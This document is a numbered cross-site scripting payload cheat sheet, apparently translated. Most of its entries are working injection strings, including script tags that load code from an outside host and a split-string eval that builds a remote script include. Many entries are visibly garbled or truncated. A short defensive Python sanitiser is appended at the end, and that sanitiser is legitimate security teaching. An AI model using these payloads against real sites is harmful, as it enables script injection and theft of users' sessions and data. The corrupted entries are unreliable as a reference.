(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert-box payloads
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=\'#\'" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything starting with an open angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
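Most entries in this list depend on the application writing user input into a src/href attribute (or a quoted attribute in general) without checking the URL scheme or entity-encoding the value. The Python below is an added defensive example, not part of the original cheat sheet: it allowlists the scheme after normalising the value the way a browser does (entity decoding, control-character stripping, case folding), which is what defeats the mixed-case, tab, encoded-tab and null-byte variants in entries 4, 11, 12 and 17, and it encodes attribute values so the breakout in entry 6 cannot close the tag. SAFE_SCHEMES and FALLBACK_SRC are assumed application settings.

```python
import html
import re
from urllib.parse import urlsplit

# Schemes the application deliberately allows in src/href values
# (assumption: adjust to what the application actually needs).
SAFE_SCHEMES = {"http", "https", "mailto"}
# Placeholder image used when a supplied URL is rejected (assumed path).
FALLBACK_SRC = "/static/blank.png"


def is_safe_url(value: str) -> bool:
    """Allowlist the URL scheme as the browser will see it.

    Browsers decode HTML entities in attribute values, drop ASCII control
    characters (tab, newline, carriage return, NUL) inside the scheme and
    compare the scheme case-insensitively, so the check normalises the same
    way first; otherwise JaVaScRiPt:, jav<TAB>ascript:, jav&#x09;ascript:
    and java\\0script: all slip past a naive string comparison.
    """
    cleaned = html.unescape(value)
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", cleaned)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme == "":
        # Scheme-less values: allow a site-relative path only, never a
        # protocol-relative //host/... reference (entry 25 above).
        return cleaned.startswith("/") and not cleaned.startswith("//")
    return scheme in SAFE_SCHEMES


def render_img(src: str, alt: str) -> str:
    """Emit an <img> with every attribute quoted and entity-encoded, so a
    value such as "><SCRIPT>alert("XSS")</SCRIPT> (entry 6) cannot close the
    attribute or the tag; an unsafe scheme is replaced, not merely escaped."""
    if not is_safe_url(src):
        src = FALLBACK_SRC
    return '<img src="{}" alt="{}">'.format(
        html.escape(src, quote=True), html.escape(alt, quote=True)
    )


if __name__ == "__main__":
    # Constructed inputs mirroring entries 4, 11, 12 and 6 of the list above.
    for sample in ("JaVaScRiPt:alert('XSS')", "jav\tascript:alert('XSS')",
                   "jav&#x09;ascript:alert('XSS')", "https://example.com/a.png"):
        print(repr(sample), "->", is_safe_url(sample))
    print(render_img('"><SCRIPT>alert("XSS")</SCRIPT>"', 'a "quoted" alt'))
```

The scheme check must run on the value the browser will parse, so do the entity decoding and control stripping before comparing rather than matching literal strings in the raw input.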